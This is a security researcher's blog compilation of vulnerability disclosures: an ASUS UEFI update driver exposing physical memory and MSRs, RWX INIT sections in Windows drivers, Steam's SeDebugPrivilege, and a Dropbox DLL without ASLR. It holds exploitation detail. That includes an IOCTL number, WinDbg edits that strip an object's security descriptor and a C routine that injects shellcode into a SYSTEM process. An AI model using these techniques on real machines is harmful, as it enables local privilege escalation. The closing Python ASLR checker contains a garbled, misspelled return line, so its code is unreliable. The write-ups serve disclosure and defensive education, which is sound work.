ASUS UEFI Update Driver Physical Memory Read/Write

A short while ago, slipstream/RoL dropped an exploit for the ASUS memory mapping driver (ASMMAP/ASMMAP64) which was vulnerable to complete physical memory access (read/write) to unprivileged users, allowing for local privilege escalation and all sorts of other problems. An aside to this was that there were also IOCTLs available to perform direct I/O operations (in/out instructions) directly from unprivileged usermode, which had additional interesting impacts for messing with system firmware without triggering AV heuristics.

When the PoC was released, I noted that I’d reported this to ASUS a while beforehand, later clarifying that I’d actually reported it to them in March 2015. To be fair to ASUS, they were initially very responsive via email, and particularly via Twitter DM on the @ASUSUK account, and it seems like they had some bad luck with both the engineer working on the fixes and the customer support advisor handling my tickets leaving the company, resulting in a significant delay in the triage and patch processes. However, promises to keep me in the loop were not kept, and I was always chasing them up for answers.

In addition to the ASMMAP bugs, I also reported the exact same bugs in their UEFI update driver (AsUpIO.sys). This driver is deployed as part of the usermode UEFI update toolset, and exposes almost identical functionality which (as slipstream/RoL pointed out) is likely from an NT3.1 example driver that was written long before Microsoft took steps to segregate malicious users from physical memory in any meaningful way.

One additional piece of functionality which I believe was missed from the original ASMMAP vulnerability release was the ability to read/write Model Specific Registers (MSRs) as an unprivileged user. This was, again, a function exposed as an IOCTL in the driver. For those of you not versed in MSRs, they’re implementation-specific registers which contain control and status values for the processor and supporting components (e.g. SMM). You can read more about them in chapter 35 of the Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 3. MSRs are particularly powerful registers in that they offer the ability to enable or disable all sorts of internal functionality on the processor, and are at least theoretically capable of bricking hardware if you abuse them in the wrong way.

One of the most interesting MSRs is the Extended Feature Enable Register (EFER) at index 0xC0000080, which contains the No-eXecute Enable (NXE) and Secure Virtual Machine Enable (SVME) bits. Switching the NXE bit off on a live VM in VirtualBox crashes the VM with a “Guru Meditation” error (there’s an age cutoff on people who will get that reference), which I suppose is a novel anti-VM trick on its own, not to mention the intended behaviour of switching off NX on real-steel hardware.

Rather than just providing you with a bit of PoC code, I thought I’d take the opportunity to go through exactly how I discovered the bugs and what approach I took towards reliable exploitation.

Generally speaking, Windows drivers have a number of interfaces through which usermode code may communicate with them. The most important are I/O Request Packets (IRPs), which are sent to a driver when code performs a particular operation on the driver’s device object. The exposed functions which IRPs are sent to are known as Major Functions, examples of which include open, close, read, write, and I/O control (otherwise known as IOCTL). The descriptor structure for a driver object contains an array of function pointers, each pointing to a dispatch function for a major function. These are fantastic targets for bug-hunting in drivers, since they’re usermode-accessible (and often accessible from non-admin accounts) and can often result in local privilege escalation to kernelmode.

The first key thing to look for is whether or not the driver object is accessible as a low-privilege user. It’s all well and good finding a bug which gets you kernel code execution, but if you’ve got to be an admin to exploit it it’s a bit of a non-issue. When a driver goes through its initialisation steps, it usually names itself and creates a device object using the IoCreateDevice API, and a symbolic link to the DosDevices object directory using the IoCreateSymbolicLink API. An example is as follows:

    PDEVICE_OBJECT pDeviceObject = NULL;
    UNICODE_STRING driverName, dosDeviceName;
    RtlInitUnicodeString(&driverName, L"\\Device\\Example");
    RtlInitUnicodeString(&dosDeviceName, L"\\DosDevices\\Example"); 
    status = IoCreateDevice(pDriverObject, 0, &driverName,
                            FILE_DEVICE_UNKNOWN, 0,
                            FALSE, &pDeviceObject);
    // ...
    IoCreateSymbolicLink(&dosDeviceName, &driverName);
    // ...
    return status;

In order to check whether or not the driver’s device object is accessible by low-privilege users, we need to know what name it picked for itself. There are a few approaches to this: we could debug the system and breakpoint on the IoCreateDevice API; we could reverse engineer the driver using a tool such as IDA; or we could simply extract all the strings from the binary and look for any that start with “\Device\”.

In the case of AsUpIO.sys, dropping it into IDA shows that it does exactly the above, using the name “AsUpdateio”:


This now tells us exactly what we should be looking for. In order to inspect the device object and view its discretionary access control list (DACL), we can use WinObj.


As we can see here, the Everyone group is given Read, Write, and Special permissions, allowing the device object to be directly interacted with from low-privilege usermode. Note that these ACEs are not set by the driver; this is a somewhat “hardened” permissions set applied by an up-to-date Windows 10 install, although it is still accessible by everyone. In Windows 8 and earlier, setting the DACL to null simply results in it having no ACEs, allowing everyone complete access, unless you apply a hardened security policy. This is because, prior to Windows 10, the root object namespace had no inheritable ACEs.

The snippet above also gives us the address of the HandleIoControl function which is assigned to handle the Create, Close, and IOCTL major functions. Reverse engineering this shows the IOCTL number which is used for mapping memory:


(note: the ASUS_MemMap name was set by me; I renamed it after analysing each function in this set of branches to work out their functions)

Now that we have access to the driver, we want to exploit the bugs. In this case the IOCTL for the memory mapping is 0xA040244C, which can be found by reverse engineering the HandleIoControl routine we found above. Just as in the original slipstream/RoL exploit, this IOCTL can be used to map any physical memory section to usermode. The downside, from an exploitation perspective, is that the function covers a wide range of potential memory locations, including addresses where the HAL has to translate to bus addresses rather than the usual physical memory. This is fine if we know a specific location we want to map and access, but it becomes a bit fraught if we want to read through all of physical memory; trying to map and read an area of memory reserved for certain hardware might crash or lock up the system, and that’s not much use for a privesc.

The approach I took was to find a specific location in kernel memory which I knew was safe, then map and read that, and use that single operation to gain the ability to reliably read memory over the lifetime of the system. The ideal object to gain control over is \Device\PhysicalMemory, as this gives us direct usermode access to physical memory. The first hurdle is that we need a kernel pointer leak to identify the address of that object’s descriptor in kernel memory.

First, we want to know which processes have a handle to this object. By running Process Explorer as an administrator (we don’t need to do this in an actual attack scenario), we can see that the System process keeps a handle to it open:


Using an undocumented feature of the NtQuerySystemInformation API, i.e. the SystemHandleInformation information class, we can pull out information about every single handle open on the system. The returned structure for each handle looks like the following:

    typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
        DWORD    dwProcessId;
        BYTE     bObjectType;
        BYTE     bFlags;
        WORD     wValue;
        PVOID    pAddress;
        DWORD    GrantedAccess;
    } SYSTEM_HANDLE_TABLE_ENTRY_INFO;

The pAddress field points to the kernel memory address of the object’s descriptor. By enumerating through all open handles on the system and checking for dwProcessId=4 (i.e. the System process) and bObjectType matching the object type ID of a section (this differs between Windows versions), we can find all the sections open by the System process, one of which we know will be \Device\PhysicalMemory. In fact, System only has three handles open to sections in Windows 10, so we can just give ourselves access to all of them and not worry too much.

Of course, now that we have the address of the section descriptor in kernel memory, we still need to actually take control of that section object somehow. Let’s take a look at the header structure for the object, 0x30 bytes before the section descriptor, in WinDbg:

0: kd> dt nt!_OBJECT_HEADER 0xffffc001`cca13bd0-0x30
   +0x000 PointerCount     : 0n65537
   +0x008 HandleCount      : 0n2
   +0x008 NextToFree       : 0x00000000`00000002 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0x23 '#'
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0x2 ''
   +0x01b Flags            : 0x16 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y1
   +0x01b KernelOnlyAccess : 0y1
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y1
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Spare            : 0x5000000
   +0x020 ObjectCreateInfo : 0x00000000`00000001 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0x00000000`00000001 Void
   +0x028 SecurityDescriptor : 0xffffc001`cca12273 Void
   +0x030 Body             : _QUAD

Now, remember earlier when I said that having a DACL set to null gives everyone access? The SecurityDescriptor field here is, in fact, exactly what gets set to null in such a situation. If we overwrite the field with zeroes, then (theoretically) everyone has access to the object. However, this object is a special case: it has the KernelOnlyAccess flag set. This means that no usermode process can gain a handle to it. We need to switch this off too, so we set the Flags field to 0x10 to keep the PermanentObject flag but clear the rest:

0: kd> eb (0xffffc001`cca13bd0-0x30)+0x1b 0x10
0: kd> eq (0xffffc001`cca13bd0-0x30)+0x28 0
0: kd> dt nt!_OBJECT_HEADER 0xffffc001`cca13bd0-0x30
   +0x000 PointerCount     : 0n65537
   +0x008 HandleCount      : 0n2
   +0x008 NextToFree       : 0x00000000`00000002 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0x23 '#'
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0x2 ''
   +0x01b Flags            : 0x10 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y0
   +0x01b KernelOnlyAccess : 0y0
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y1
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Spare            : 0x5000000
   +0x020 ObjectCreateInfo : 0x00000000`00000001 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0x00000000`00000001 Void
   +0x028 SecurityDescriptor : (null) 
   +0x030 Body             : _QUAD

Now that the KernelOnlyAccess and SecurityDescriptor fields are zeroed out, we can gain access to the object from usermode as a non-administrative user:


In a real exploitation scenario we’d do these edits via the driver bug rather than WinDbg, mapping the page containing the object header and writing to it directly.

Disabling the flags and clearing the security descriptor allows us to map the PhysicalMemory object into any process and use it to gain further control over the system, without worrying about the weird intricacies of how the driver handles certain addresses. This can be done by scanning for EPROCESS structures within memory and identifying one, then jumping through the linked list to find your target process and a known SYSTEM process (e.g. lsass), then duplicating the Token field across to elevate your process. This part isn’t really that novel or interesting, so I won’t go into it here.

One tip I will mention is that you can make the exploitation process much more reliable if you set your process’ priority as high as possible and spin up threads which perform tight loops to keep the processor busy doing nothing, while you mess with memory. This helps keep kernel threads and other process threads from being scheduled as frequently, making it less likely for you to hit a race condition and bugcheck the machine. I only saw this happen once during the hundred or so debugging sessions I did, so it’s not critical, but still worth keeping in mind.

In closing, I hope the teardown of this bug and my exploitation process has been useful to you. While you certainly can directly exploit the bug, it’s not without potential peril, and it’s often safer to pivot to a more stable approach.

Take-home points for security people and driver developers in general:

  • WHQL does not mean the code is secure, nor does it even mean the code is stable or safe. Microsoft happily signed a number of these drivers with vulnerability-as-a-feature code within them. These bugs were trivially identifiable; this indicates that WHQL is likely an automated process to ensure adherence to little more than a “don’t use undocumented / unsupported functions” requirement.
  • Ensure that appropriate DACLs are placed on objects, particularly the device object, via the use of IoCreateDeviceSecure and the security attributes parameter to Create* calls (e.g. CreateMutex, CreateEvent, CreateSemaphore). A null DACL means anyone can access the object.
  • Drivers should not expose administrative functionality (e.g. UEFI updates) to non-administrative users (e.g. the Everyone group). Ensure that object DACLs reflect this.

Take-home points for ASUS:

  • Implement a security contact mailbox as per the guidance in RFC2142 and ensure that it is checked and managed by someone versed in security. Create a page on your website which lists this contact and outlines your expectations from researchers when reporting security issues.
  • Your Twitter support staff are better at communicating with customers than your support ticket people. You could stand to learn from their more informal and responsive model.
  • Ensure that anything assigned to someone who leaves the company is appropriately reassigned with guidance from that individual. This should help ensure that patches don’t end up delayed by 15 months.
  • Get your code assessed by a 3rd party security contractor before releasing it to customers, and ensure that your developers are given appropriate training on secure development practices. The vulnerable code used was likely copied from examples into a number of your drivers, which indicates that problems may be widespread.

Disclosure timeline:

  • 24th March 2015 – Submitted bug as ticket to ASUS (WTM20150324082900771)
  • 25th March 2015 – Acknowledgement from ASUS
  • 25th March 2015 – Sent reply email with additional information.
  • 27th March 2015 – Reply from “J” from ASUS, who says an engineer has a fix and is liaising with their own security researcher on the matter.
  • < I forgot about the issue for a long time >
  • 4th September 2015 – Sent email to query status of the issue.
  • 7th September 2015 – Reply from “Anthony” from ASUS, informing me that the agent I’d been interacting with before had left the company, asking for more details on the issue.
  • 7th September 2015 – Sent a response with another full report of the issue.
  • 21st September 2015 – No reply, sent a request for a status update.
  • 22nd September 2015 – Contacted @ASUSUK on Twitter. Had conversation via DM trying to get a status update.
  • 28th September 2015 – Chased up @ASUSUK for an update.
  • 29th September 2015 – Reply informing me that the HQ office in Taipei was closed due to a typhoon.
  • 7th October 2015 – Sent another chase-up message to @ASUSUK.
  • 7th October 2015 – Reply from them; no updates from the office but a promise to let me know when the patch is out.
  • 25th November 2015 – Another chase-up DM to @ASUSUK.
  • 25th November 2015 – HQ were offline, told I’d get a reply the next day. No reply came.
  • 9th May 2016 – Still nothing back from ASUS via email or Twitter, sent another chase-up email and DM informing them of my intent to disclose within 28 days due to the long delays in releasing a fix.
  • 10th May 2016 – Told that Anthony is OOO until Monday.
  • 12th May 2016 – Told that the delays were due to the project leader at HQ leaving, they’re trying to source someone to fix it and push a fix out ASAP.
  • 12th May 2016 – Sent reply asking to be kept in the loop. ASUS replies saying they’ll keep me informed.
  • 12th June 2016 – Disclosed.

Vulnerable file details:

  • MD5: 1392B92179B07B672720763D9B1028A5
  • SHA1: 8B6AA5B2BFF44766EF7AFBE095966A71BC4183FA
  • Signing certificate serial number: 12 d5 c9 e2 94 9d 48 ab ac cd 35 14 f0 fb 22 ad

W^X policy violation affecting all Windows drivers compiled in Visual Studio 2013 and previous

Back in June, I was doing some analysis on a Windows driver and discovered that the INIT section had the read, write, and executable characteristics flags set. Windows executables (drivers included) use these flags to tell the kernel what memory protection should be applied to that section’s pages once the contents are mapped into memory. With these flags set, the memory pages become both writable and executable, which violates the W^X (write XOR execute) policy, a concept which is considered good security practice. This is usually considered a security issue because it can give an attacker a place to write arbitrary code when staging an exploit, similar to how pre-NX exploits used the stack as a place to execute shellcode.

While investigating these section flags in the driver, I also noticed a slightly unusual flag was set: the DISCARDABLE flag. Marking a section as discardable in user-mode does nothing; the flag is meaningless. In kernel-mode, however, the flag causes the section’s pages to be unloaded after initialisation completes. There’s not a lot of documentation around this behaviour, but the best resource I discovered was an article on Raymond Chen’s “The Old New Thing” blog, which links off to some other pages that describe the usage and behaviour in various detail. I’d like to thank Hans Passant for giving me some pointers here, too.

The short version of the story is that the INIT section contains the DriverEntry code (think of this like the ‘main()’ function of a driver), and it is marked as discardable because it isn’t used after the DriverEntry function returns. From gathering together scraps of information on this behaviour, it seems that the compiler does this because the memory that backs the DriverEntry function must be pageable (though I’m not sure why), but any driver code which may run at DISPATCH_LEVEL or above must not try to access any memory pages that are pageable, because there’s no guarantee that the OS can service the memory access operation. This is further evidenced by the fact that the CODE section of drivers is always flagged with the NOT_PAGED characteristic, whereas INIT is not. By discarding the INIT section, there can be no attempt to execute this pageable memory outside of the initialisation phase. My understanding of this is incomplete, so if anyone has any input on this, please let me know.

The DISCARDABLE behaviour means that the window of exploitation for targeting the memory pages in the INIT section is much smaller – a vulnerability must be triggered during the initialisation phase of a driver (before the section is discarded), and that driver’s INIT section location must be known. This certainly isn’t a vulnerability on its own (you need at least a write-what-where bug to leverage this) but it is also certainly bad practice.

Here’s where things get fun: in order to compare the driver I was analysing to a “known good” sample, I looked into some other drivers I had on my system. Every single driver I investigated, including ones that are core parts of the operating system (e.g. win32k.sys), had the same protection flags. At this point I was a little stumped – perhaps I got something wrong, and the writable flag is needed for some reason? In order to check this, I manually cleared the writable flag on a test driver, and loaded it. It worked just fine, as did several other test samples, from which I can surmise that it is superfluous. I also deduced that this must be a compiler (or linker) issue, since both Microsoft drivers and 3rd party drivers had the same issue. I tried drivers compiled with VS2005, VS2010, and VS2013, and all seemed to be affected, meaning that pretty much every driver on Windows Vista to Windows 8.1 is guaranteed to suffer from this behaviour, and Windows XP drivers probably do too.

INIT section of ATAPI Driver from Windows 8.1

While the target distribution appears to be pretty high, the only practical exploitation path I can think of is as follows:

  1. Application in unprivileged usermode can trigger a driver to be loaded on demand.
  2. Driver leaks a pointer (e.g. via debug output) during initialisation which can be used to determine the address of DriverEntry in memory.
  3. A write-what-where bug in another driver or in the kernel that is otherwise very difficult to exploit (e.g. due to KASLR, DEP, KPP, etc.) is triggered before the DriverEntry completes.
  4. Bug is used to overwrite the end of the DriverEntry function.
  5. Arbitrary code is executed in kernel.

This is a pretty tall order, but there are some things that make it more likely for some of the conditions to arise. First, since any driver can be used (they all have INIT marked as RWX) you only need to find one that you can trigger from unprivileged usermode. Ordinarily the race condition between step 1 and step 4 would be difficult to hit, but if the DriverEntry calls any kind of synchronisation routine (e.g. ZwWaitForSingleObject) then things get a lot easier, especially if the target sync object happens to have a poor or missing DACL, allowing for manipulation from unprivileged usermode code. These things make it a little easier, but it’s still not very likely.

Since I was utterly stumped at this point as to why drivers were being compiled in this way, I decided to contact Microsoft’s security team. Things were all quiet on that front for a long time; aside from an acknowledgement, I only heard back from them yesterday (2015/09/03). To be fair to them, though, it was a complicated issue and even I wasn’t very sure as to its impact, and I forgot all about it until their response email.

Their answer was as follows:

After discussing this issue internally, we have decided that no action will be taken at this time. I am unable to allocate more resources to answer your questions more specifically, but we do thank you for your concern and your commitment to computer security.

And I can’t blame them. Exploiting this issue would need a powerful attack vector already, and even then it’d be pretty rare to find the prerequisite conditions. The only thing I’m a bit bummed about is that they couldn’t get anyone to explain how it all works in full.

But the story doesn’t end there! In preparation for writing this blog post, I opened up a couple of Microsoft’s drivers on my Windows 10 box to refresh my memory, and found that they no longer had the execute flag set on the INIT section. It seems that Microsoft probably patched this issue in Visual Studio 2015, or in a hotfix for previous versions, so that it no longer happens. Makes me feel all warm and fuzzy inside. I should note, however, that 3rd party drivers such as Nvidia’s audio and video drivers still have the same issue, which implies that they haven’t been recompiled with a version of Visual Studio that contains the fix. I suspect that many vendor drivers will continue to have this issue.

I asked Microsoft whether it had been fixed in VS2015, but they wouldn’t comment on the matter. Since I don’t have a copy of VS2015 yet, I can’t verify my suspicion that they fixed it.

In closing, I’d like to invite anyone who knows more than me about this to provide more information about how/why the INIT section is used and discarded. If you’ve got a copy of VS2015 and can build a quick Hello World driver to test it out, I’d love to see whether it has the RWX issue on INIT.

Disclosure timeline:

  • 29th June 2015 – Discovered initial driver bug
  • 30th June 2015 – Discovered wider impact (all drivers affected)
  • 2nd July 2015 – Contacted Microsoft with report / query
  • 2nd July 2015 – Microsoft replied with acknowledgement
  • 6th July 2015 – Follow-up email sent to Microsoft
  • [ mostly forgot about this, so I didn’t chase it up ]
  • 3rd September 2015 – Microsoft respond (see above)
  • 3rd September 2015 – Acknowledgement email sent to Microsoft, querying fix status
  • 4th September 2015 – Microsoft respond, will not comment on fix status
  • 4th September 2015 – Disclosed

Steam Code Execution – Privilege Escalation to SYSTEM (Part 2)

In my previous post I talked about a vulnerability in Steam which allows you to bypass UAC. I’m going to be totally transparent here: I fucked up. I wrote the draft post a few days back, then did some more work on the vulnerability. I discovered something much more serious in the process. I posted last night’s blog post at 1am, tired as hell, and in my sleep-deprived state I completely neglected to update it properly, and there are several mistakes and bits of missing information. The draft went out and confused a lot of people. So, for that, I apologise. I’m going to leave it there so people can see it, because it’ll remind me not to do that next time.

Now, onto the real impact of the vulnerability: I can leverage it to gain code execution as SYSTEM. How? Well, it turns out that Steam.exe gives itself one unusual privilege – the privilege to debug other processes. This is called SeDebugPrivilege, and one of its features is that it allows the process to bypass access control lists (ACLs) on processes when calling OpenProcess, i.e. the process can open a handle to any process it likes, with any access rights it likes.

Here’s how you can elevate to SYSTEM when you have SeDebugPrivilege:

  1. Open a handle to a process that is running as SYSTEM, with PROCESS_ALL_ACCESS as the access flag.
  2. Use VirtualAllocEx to allocate a block of memory in the remote process, with the executable flag set.
  3. Use WriteProcessMemory to copy a block of shellcode into that memory buffer.
  4. Use CreateRemoteThread to create a new thread in the remote process, whose start address is the base address of the memory allocation.
  5. Bingo! You just got a privesc to SYSTEM.
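The steps above can be sketched in C as follows. This is a hedged sketch, not Steam’s code: the function name is mine, the pid and shellcode arguments are placeholders, and it assumes the calling process already holds SeDebugPrivilege (so the OpenProcess call ignores the target’s ACL):

```c
#include <windows.h>

/* Sketch: run shellcode inside a SYSTEM process, relying on
 * SeDebugPrivilege to make OpenProcess succeed regardless of ACLs. */
BOOL inject_system(DWORD pid, const unsigned char *shellcode, SIZE_T len)
{
    /* Step 1: open the SYSTEM process with full access. */
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProc) return FALSE;

    /* Step 2: allocate an executable buffer in the remote process. */
    LPVOID remote = VirtualAllocEx(hProc, NULL, len,
                                   MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
    BOOL ok = FALSE;
    if (remote &&
        /* Step 3: copy the shellcode into that buffer. */
        WriteProcessMemory(hProc, remote, shellcode, len, NULL))
    {
        /* Step 4: start a remote thread at the buffer's base address. */
        HANDLE hThread = CreateRemoteThread(hProc, NULL, 0,
                                            (LPTHREAD_START_ROUTINE)remote,
                                            NULL, 0, NULL);
        if (hThread) { CloseHandle(hThread); ok = TRUE; }
    }
    CloseHandle(hProc);
    return ok;
}
```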

In this case, once you’ve got code execution inside Steam, you can utilise this trick to escalate yourself to SYSTEM. There’s your privesc vuln.

Steam UAC bypass via code execution

Like many other gamers, I love Steam. Not only is it ridiculously convenient, but it’s also become a pretty awesome platform for indie game developers to get their games out there. It provides an online store platform for 54 million users, and most of the time it does an excellent job. That’s partly the reason why I’m so frustrated with Valve right now.

I spent a good few hours playing with a bug I found in Steam, and then made an effort to provide Valve with a clear, concise, detailed security vulnerability notification. Their response has been one of pure opacity, with not a single ounce of professional courtesy.

On Tuesday 17th September 2013, I submitted a vulnerability report to Valve, the full text of which follows:

I have discovered a vulnerability within the Steam client application that allows for arbitrary memory copies to be initiated within the Steam process. These issues can be triggered at multiple crash sites, and range in severity from unexploitable crash (denial of service) to full compromise of the process.

Technical details:

The shared memory section GameOverlayRender_PIDStream_mem-IPCWrapper does not have an ACL applied to it, so any user may open a handle to it with all privileges. This is especially important in multi-user systems such as terminal services, or in situations where other potentially risky processes are sandboxed into other user accounts within the same session.

By opening a handle to the section and writing random garbage data, then signalling the Steam3Master_SharedMemLock wait handle (which also does not have an ACL) it is possible to cause the Steam client to crash. I have discovered multiple locations where the crash may occur, and many are within REP MOVS copy instructions. In some cases it is possible to control the destination address (EDI), the source address (ESI), and/or the memory at the target site of ESI. In some cases other general purpose registers were modified. By carefully crafting a payload, it would certainly be possible to cause code execution via heap corruption, e.g. by overwriting a callback pointer. Despite the use of ASLR and DEP on the process, certain modules (e.g. Steam.dll, steamclient.dll, CSERHelper.dll) are not marked as ASLR supporting. It is possible to use a technique called Return Oriented Programming (ROP) to bypass ASLR and DEP in cases such as this, where there are non-ASLR modules loaded into the process.

I have created a proof of concept application, which can be provided upon request, though it should be trivial for a developer to discover the source of the vulnerabilities.


The fix I would propose is that an appropriate explicit ACL is set on the aforementioned objects, enforcing that only the user that created the Steam process can access the object. Additionally, I would recommend that proper bounds and sanity checking is enforced on the shared memory object. Furthermore, it would be prudent to ensure that memory copy operations (e.g. memcpy) are performed using SDL-approved functions, such as memcpy_s.

Responsible disclosure policy:

This ticket serves as initial notification of a security issue. Please respond within 30 days, detailing your acceptance or rejection of the report, the proposed mitigation (if any), and patch timescale. If no satisfactory response is received within 30 days, it will be assumed that you do not consider the issues in this report to constitute a security issue, and they will be publicly disclosed. My normal public disclosure timescale is 90 days after initial notification, but this can be extended upon reasonable request. Most importantly, please remember that this is an invitation to work with me to help improve your product and increase the security posture of your customers. Should you require further information about the issue, or any other aspects of this notification, please contact me.

Thank you.

On Sunday 22nd of September 2013, after further pondering the issue, I provided this addendum to the report:

Impact update:

On further consideration, the impact of this issue is not exactly as described above. Due to the location of the shared memory section object within the object manager hierarchy, it is not accessible across sessions unless the reading process is running in an administrative context. This negates any cross-session privilege escalation, so one user session cannot directly attack another in this manner.

However, an additional impact has been discovered. If the attacking process runs in the same session as the user (e.g. malware) and waits for Steam to escalate its privileges to an administrative context via User Account Control (UAC), it may then exploit the vulnerability and inherit that escalation. This completely bypasses UAC and could allow local malware to jump from a limited or guest user context to a full administrative context. Not only is this directly problematic for home users, but it is especially important in domain environments where workstation security is enforced by group policy, which can be bypassed from an administrative security context.

I feel that this new impact scenario is more significant, since it targets the most common configuration of Steam, i.e. a single-session machine.

As noted before, please feel free to contact me if you have any questions. For absolute clarity, the cut-off point for non-responsiveness is the 17th of October 2013, i.e. 30 days after initial notification. Please respond before then as per the responsible disclosure policy detailed above.

Thank you.

I recognise that this isn’t exactly an earth-shattering vulnerability, as UAC isn’t “officially” a privilege segregation. That said, it’s significant enough to warrant fixing, especially as it results in memory corruption. Furthermore, I’m sure someone could find a way to utilise the issue in a much more interesting way than I did.
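The bounds-and-sanity-checking recommended in the report can be sketched in a platform-neutral way. The length-prefixed message layout below is entirely hypothetical (the real Steam shared-memory format is undocumented here); the point is simply that every field read out of attacker-writable shared memory must be validated before it drives a copy operation:

```python
import struct

# Hypothetical message layout for an untrusted shared-memory blob:
# a 4-byte little-endian length prefix followed by that many payload bytes.
HEADER = struct.Struct("<I")
MAX_PAYLOAD = 4096  # sanity cap chosen by the reader, never by the writer

def read_message(blob: bytes) -> bytes:
    """Parse one length-prefixed message, rejecting anything inconsistent."""
    if len(blob) < HEADER.size:
        raise ValueError("blob too short for header")
    (length,) = HEADER.unpack_from(blob, 0)
    # Never trust a length field from shared memory: bound it both by a
    # fixed cap and by the number of bytes actually present.
    if length > MAX_PAYLOAD or HEADER.size + length > len(blob):
        raise ValueError("declared length out of bounds")
    return blob[HEADER.size:HEADER.size + length]
```

Had the vulnerable copy routines applied checks of this kind before their REP MOVS operations, garbage written into the section would produce a clean error rather than a controllable crash.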

A Valve employee under the name of “Support Tech Alex” responded the next day, apologising for the delay and informing me that the details would be forwarded to the appropriate department. Excellent, I thought. I thanked him, and waited. A week passed, then two. Still no response.

On Wednesday 9th October, I discovered that they had closed the ticket. I asked why, and their response was as follows:

Hello Graham,

Unfortunately, you will not receive a notification about any action taken as a result of this report.

If you have a business related inquiry, please visit

If you have any further difficulty, please let us know.

This annoys me, and I think it demonstrates a fundamental lack of understanding of whitehats on Valve’s part. In my opinion and experience, what drives a whitehat isn’t a lust for rewards, or free swag, or even being thanked by the company (though that is nice). What drives a whitehat is the quest for technical knowledge, and the satisfaction of having helped fix a security issue. When a vendor cuts a whitehat out of the loop, and leaves them hanging without even saying whether they’re going to look into it, it kills all motivation. Not only is it unprofessional, but it’s also downright rude to reward a person’s hard work with little more than contempt.

I didn’t go into this expecting Valve to pay me or even send me a T-shirt for finding the bug. I did, however, at least expect to get something along the lines of “thanks, we’ll fix that, should get pushed out in the next couple of months”. Instead what I got was opacity and avoidance, and that’s not the way to deal with security notifications. Hopefully a public shaming will do you some good, Valve. Treat whitehats well, and you’ll do well. Treat whitehats badly, and you might find that they take their reports elsewhere.

Update: In my sleep-deprived state last night, I forgot to update this draft before publishing it. There’s actually a much bigger vulnerability here: Steam gives itself SeDebugPrivilege, which allows it to bypass ACLs on OpenProcess calls, meaning it can inject code into any other process on the system, including those running as SYSTEM. It’s a full privesc. I’ve written a follow-up post that explains this in more detail.

Installing Dropbox? Prepare to lose ASLR.

Dropbox has become a daily part of my life. I rely on it to synchronise data between my growing set of devices. But how much of an impact does it have on the security of my system? I decided to find out by digging around in exactly what it does to my machine, or more specifically, the processes running on it.

The first thing I want to check is which modules are loaded into various processes. Tools like Dropbox often extend the functionality of other programs using shell extensions, which are nothing more than specially designed DLLs loaded into process memory. Let’s see what we’ve got…

Dropbox Files

Interesting! Looks like we’ve got two extension DLLs, one 32-bit and one 64-bit. These are likely used to add extra context menu options when right-clicking on files. Now let’s find out where they get injected. For this, we’ll use good ol’ trusty Process Explorer. By going to Find » Find Handle or DLL, we can search for the DLLs in running processes.

Dropbox DLL Injection

It looks like it’s being loaded into processes that have created windows, which implies it’s probably an AppInit DLL, but that turns out not to be the case – the AppInit_DLLs registry key doesn’t contain that DLL. This implies that something more active is going on, and that Dropbox deliberately selects which processes to inject into. I may be mistaken here; I’m not sure. Either way, it’s a little odd that it chose to inject into Notepad++ and other innocuous processes.

(Update: thanks to zeha and 312c on Reddit for pointing out that it’s likely injected via the standard file browser shell, due to the Dropbox icon in the favourites list)

The biggest problem becomes clear when you take a look at the module in a running process. In this case, it’s Firefox:

Dropbox in Firefox

Notice that the Dropbox extension DLL doesn’t have the ASLR flag set. This means that any vulnerability in Firefox becomes a lot easier to exploit, since the Dropbox module provides an unrandomised anchor for a ROP chain. Ignore PowerHookMenu.dll here – I’m aware of that issue and have notified the developer, but it’s infrequently seen on people’s machines so it’s not so bad.

Let’s just quickly verify that the DLL isn’t ASLR enabled at all, by checking the DLL characteristics flags in the file…

ASLR disabled for DLL

Definitely not enabled.

Anyway, the take-away issue here is that Dropbox arbitrarily injects an ASLR-disabled DLL into various 32-bit and 64-bit processes, causing significant degradation in the efficacy of ASLR across the entire system. With no ASLR, an attacker could craft an exploit payload that utilises executable code within the injected DLL to produce a ROP chain, leading to code execution. This is significantly problematic in high-risk programs like web browsers and torrent clients.
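Checking the flag shown above doesn’t require special tooling. The sketch below parses just enough of the PE headers to read the DllCharacteristics field and test the DYNAMIC_BASE (ASLR) bit; it assumes a well-formed PE file and omits the error handling a robust tool would need:

```python
import struct

# IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: the "ASLR enabled" flag.
DYNAMIC_BASE = 0x0040

def has_aslr(pe: bytes) -> bool:
    """Check the DYNAMIC_BASE bit in a PE file's DllCharacteristics."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    # e_lfanew at offset 0x3C points at the 'PE\0\0' signature.
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # Optional header follows the 4-byte signature and 20-byte file header.
    opt = e_lfanew + 4 + 20
    # DllCharacteristics sits at offset 0x46 into the optional header for
    # both PE32 and PE32+ images.
    (dll_chars,) = struct.unpack_from("<H", pe, opt + 0x46)
    return bool(dll_chars & DYNAMic_BASE) if False else bool(dll_chars & DYNAMIC_BASE)
```

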